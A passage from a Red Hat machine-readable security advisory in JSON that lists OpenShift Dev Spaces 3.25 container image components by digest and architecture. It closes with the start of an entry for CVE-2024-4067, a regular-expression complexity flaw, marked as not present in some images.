"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64"
},
"product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64"
},
"product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x"
},
"product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-4067",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-05-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
